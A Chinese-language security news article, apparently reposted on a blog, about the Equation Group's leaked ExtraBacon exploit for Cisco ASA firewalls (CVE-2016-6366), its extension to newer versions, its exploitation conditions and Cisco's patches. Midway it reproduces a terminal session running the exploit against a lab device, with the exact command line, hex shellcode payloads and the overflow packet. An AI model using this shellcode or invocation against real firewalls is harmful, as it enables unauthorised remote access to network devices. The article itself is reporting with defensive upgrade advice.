关闭

围观方程式组织“杀器”ExtraBacon,思科新版ASA防火墙也遭殃

306人阅读 评论(0) 收藏 举报
分类:

最近我们一直在说NSA方程式组织被黑事件很大条,这个入侵NSA的神秘组织The Shadow Brokers到现在都还没有揭开神秘面纱。实际上,NSA被黑事件之所以如此引人关注,很大部分原因是,The Shadow Brokers公布的、原属于方程式组织的工具,实在是令人叹为观止。

比如其中一款名为BenignCertain的工具,是专门针对思科的PIX防火墙家族产品。安全研究人员在测试后发现,这款工具可用来解密VPN流量(方法是发送包至目标设备,转储内存中包含VPN认证密码的部分)。虽然思科PIX系列产品早在2009年就停产了,但许多政府部门、企业单位还在使用,影响PIX version 6.x以及之前的所有版本。欲了解详情,请点击这里

也就是说,如果企业选择思科PIX产品,NSA是可以进行VPN流量的长期监听的。所以思科方面表示,虽然PIX已经不受支持了,但我们还是很负责任地进行了调查,问题真的存在哦!所以请亲们选择我们的最新产品哦!(Lol)

cisco-asa.jpg

不过这里要说的是The Shadow Brokers公布的另外一款漏洞利用工具ExtraBacon(额外的烤肉?)——此工具影响到的是思科Adaptive Security Appliance(ASA)产品(ASA实际涵盖了防火墙和路由器设备,PIX也在其列)。我们先前已经有文章简单带到过ExtraBacon,提到该工具仅对8.4.(4)及更早版本的ASA软件有效。

然而最近安全咨询公司SilentSignal简单修改了ExtraBacon的代码,并且表示,这货已经有能力影响更新版本的ASA软件了,其漏洞利用能力扩展至9.2.(4)版本。

ExtraBacon的威力有多大

方程式最擅长的就是发现0-day漏洞,然后构造出一流的工具来利用这些漏洞发起攻击。ExtraBacon在遭到曝光之后,思科也立刻承认了ASA产品中的确存在相应漏洞,漏洞编号CVE-2016-6366。

这是思科ASA软件SNMP(简单网络管理协议)协议代码中的一个漏洞,可致未经授权的远程攻击者,对受影响的系统发起远程执行代码攻击。这个漏洞的本质也是由于相应代码部分的缓冲区溢出。具体说来,攻击者可以向系统发出伪造的SNMP包,执行任意代码,并且获得系统的完整控制权。

Screen-Shot-2016-08-17-at-11.37.26-AM.png

安全研究人员XORcat写了个Demo文章(里面有The Shadow Brokers公布的文件哦!)。其中提到,一旦漏洞利用成功,攻击者就可在无需输入身份凭证的情况下建立起SSH或telnet连接。就是不需要输入有效用户名或密码,就能闯进ASA。想知道ExtraBacon长啥样么?

首先来看看ExtraBacon的帮助菜单:

omar@omar-io:~$ ./extrabacon_1.1.0.1.py -h

Logging to /home/omar/concernedparent

usage: extrabacon_1.1.0.1.py [-h] [-v] [-q] {info,exec} ...

Extrabacon (version 1.1.0.1)

positional arguments:

{info,exec}

optional arguments:

-h, --help show this help message and exit

-v, --verbose verbose logging, add more -v for more verbose logging

-q, --quiet minimize logging (not recommended)

针对管理接口发动exploit(192.168.1.66),ASA配置SNMPv2,community string为“cisco”,那么就会得到下面这串信息:

omar@omar-io:~$ ./extrabacon_1.1.0.1.py exec -k F_RlDw -v -t 192.168.1.66 -c cisco --mode pass-enable

WARNING: No route found for IPv6 destination :: (no default route?)

Logging to /home/omar/concernedparent

[+] Executing: ./extrabacon_1.1.0.1.py exec -k F_RlDw -v -t 192.168.1.66 -c cisco --mode pass-enable

[+] running from /home/omar

Data stored in self.vinfo: ASA803

[+] generating exploit for exec mode pass-enable

[+] using shellcode in ./versions

[+] importing version-specific shellcode shellcode_asa803

[+] building payload for mode pass-enable

appended PMCHECK_ENABLE payload eb14bf7082090931c9b104fcf3a4e92f0000005e

ebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525acac31fbb9a5b5a5a531f9baa0a5a5a531facd80

appended AAAADMINAUTH_ENABLE payload eb14bfb060060831c9b104fcf3a4e92f0000005eebece8f8ffffff5

589e557bfa5a5a5a5b8d8a5a5a531f8bba5c5a3ad31fbb9a5b5a5a531f9baa0a5a5a531facd80

[+] random SNMP request-id 425297185

[+] fixing offset to payload 49

overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.57.47.5.173.53.165.165.165.165.131.236.

4.137.4.36.137.229.131.197.88.4

*** output omitted ****

44.144.144.144.141.123.131.9.139.124.36.20.139.7.255.224.144

payload (133): eb14bf7082090931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531

f8bba525acac31fbb9a5b5a5a531f9baa0a5a5a531facd80eb14bfb060060831c9b104fcf3a4e92f0000005eebece8f8fff

fff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5c5a3ad31fbb9a5b5a5a531f9baa0a5a5a531facd80c3

EXBA msg (371): 3082016f0201010405636973636fa58201610204195985210201000201013082015130819106072b0601020101010

*** output omitted ****

0811081108110811081108110811081108110810d7b810309810b7c2414810b07817f816081100500

[+] Connecting to 192.168.1.66:161

[+] packet 1 of 1

[+] 0000 30 82 01 6F 02 01 01 04 05 63 69 73 63 6F A5 82 0..o.....cisco..

[+] 0010 01 61 02 04 19 59 85 21 02 01 00 02 01 01 30 82 .a...Y.!......0.

[+] 0020 01 51 30 81 91 06 07 2B 06 01 02 01 01 01 04 81 .Q0....+........

[+] 0030 85 EB 14 BF 70 82 09 09 31 C9 B1 04 FC F3 A4 E9 ....p...1.......

[+] 0040 2F 00 00 00 5E EB EC E8 F8 FF FF FF 55 31 C0 89 /...^.......U1..

[+] 0050 BF A5 A5 A5 A5 B8 D8 A5 A5 A5 31 F8 BB A5 25 AC ..........1...%.

[+] 0060 AC 31 FB B9 A5 B5 A5 A5 31 F9 BA A0 A5 A5 A5 31 .1......1......1

[+] 0070 FA CD 80 EB 14 BF B0 60 06 08 31 C9 B1 04 FC F3 .......`..1.....

[+] 0080 A4 E9 2F 00 00 00 5E EB EC E8 F8 FF FF FF 55 89 ../...^.......U.

...

###[ SNMP ]###

version = v2c

community = 'cisco'

\PDU \

|###[ SNMPbulk ]###

| id = <ASN1_INTEGER[425297185]>

| non_repeaters= 0

| max_repetitions= 1

| \varbindlist\

| |###[ SNMPvarbind ]###

| | oid = <ASN1_OID['.1.3.6.1.2.1.1.1']>

| | value = <ASN1_STRING['\xeb\x14\xbfp\x82\t\t1\xc9\xb1\x04\xfc\xf3\xa4\xe9/\x00

\x00\x00^\xeb\xec\xe8\xf8\xff\xff\xffU1\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\

xa51\xf8\xbb\xa5%\xac\xac1\xfb\xb9\xa5\xb5\xa5\xa51\xf9\xba\x....

 *** output omitted ****

\xa5\xa51\xf9\xba\xa0\xa5\xa5\xa51\xfa\xcd\x80\xc3']>

| |###[ SNMPvarbind ]###

| | oid = <ASN1_OID['.1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.57.47.5.173.53.165

.165.165.165.131.236.4.137.4.36.137.229

 *** output omitted ****

44.144.144.144.144.144.144.141.123.131.9.139.124.36.20.139.7.255.224.144']>

| | value = <ASN1_NULL[0]>

****************************************

[-] timeout waiting for response - performing health check

[-] no response from health check - target may have crashed

[-] health check failed

extrabacon.jpg

不过Context Industrial Security公司的工程师Michael Toecker对ExtraBacon进行了分析,发现这款工具其实是专为早期版本的ASA设计的(低于8.4(4)版),如上图所示,先检查软件版本,再下手。这或许成为ExtraBacon应用的限制短板,因为这些版本太早——但这也不奇怪,我们先前就在报道文章中提到,The Shadow Brokers泄露的这波文件至少都是3年之前的了,所以算是颇有历史。

稍加改造就能应用到新版本中

实际上,思科方面在得知自家产品存在这个漏洞之后就很快发布了安全公告(这两天思科安全和公关团队应该好忙好忙…),本周末还发布了补丁。其实我们看媒体将ExtraBacon,还有前文提到的BenignCertain,渲染得如此恐怖,实际情况是ExtraBacon的利用还是有一定条件的。

比如说,首先相应接口需要设置为接收SNMP包(在上面的例子中,就是管理接口),其次攻击者还需要知道SNMP的community string——简单说,这是个起到密码作用的字符串,用来鉴别SNMP信息发送;另外在路由和透明防火墙模式下才会受影响。加上对版本的要求,这些限制条件还是比较严苛的。

24FA67AD-3BF3-4CEB-89B0-E16F01BBA595.png

不过SilentSignal对ExtraBacon稍加改造之后,宣称ExtraBacon完全可以应用到新版ASA中,这让ExtraBacon的威胁程度又更进一步,虽然其实讲这话也没什么意思——因为ExtraBacon本身应该已经是方程式组织在用的早期工具了,不过这对不少黑客而言或许也是个好消息。

SilentSignal在Twitter上发布了演示成功的截图,表明ExtraBacon的影响力足以扩展至9.2.(4)版本的ASA软件。他们的研究人员在接受ArsTechnica采访时表示:

“我们首先针对该利用工具做研究,主要是想看看让它支持更新版本的ASA是否有难度,结果发现非常容易。这说明两件事:

第一,泄露的代码并不像某些人认为得那么差;

第二,缺乏针对思科软件的缓解技术,为攻击者提供了更多便利。”

另外Toecker认为,其实思科应该不会对这件事感到意外。上周思科的首席工程师Omar Santos就在文章谈到,ExtraBacon会在9.4(1)版本的ASA中停止工作。Tocker认为,一般停止工作可能就表明其中只是存在BUG,只要稍作合理修改,攻击者就可以再度利用。

C6DDCFDC-5E8A-4F32-866B-1BE1796E9042.png

总得说来,综合上面谈到ExtraBacon的各种利用条件,加上对针对新版本支持的修改,这款工具的使用对脚本小子来说恐怕门槛有点过高了,ExtraBacon理应也只是针对思科产品攻击的其中一环。

本周末的最新消息,思科已经针对ASA软件推出最新补丁了,专门针对ExtraBacon。提醒还在用CISCO ASA 7.2、8.0、8.1、8.2、8.3、8.4、8.5、8.6、8.7的网络管理员,尽早升级至9.1.7(9)或更新版本。针对ASA 9.1、9.5、9.6都进行了漏洞修复,修复后的软件版本号分别为9.1.7(9)、9.5(3)、9.6.1(11)。

* FreeBuf官方报道,作者/欧阳洋葱,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

欧阳洋葱

43篇文章等级:6

长者的裤腰带,比你们不知高到哪里去了...

发表评论

已有 3 条评论

0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:523756次
    • 积分:5726
    • 等级:
    • 排名:第4756名
    • 原创:22篇
    • 转载:717篇
    • 译文:2篇
    • 评论:20条
    最新评论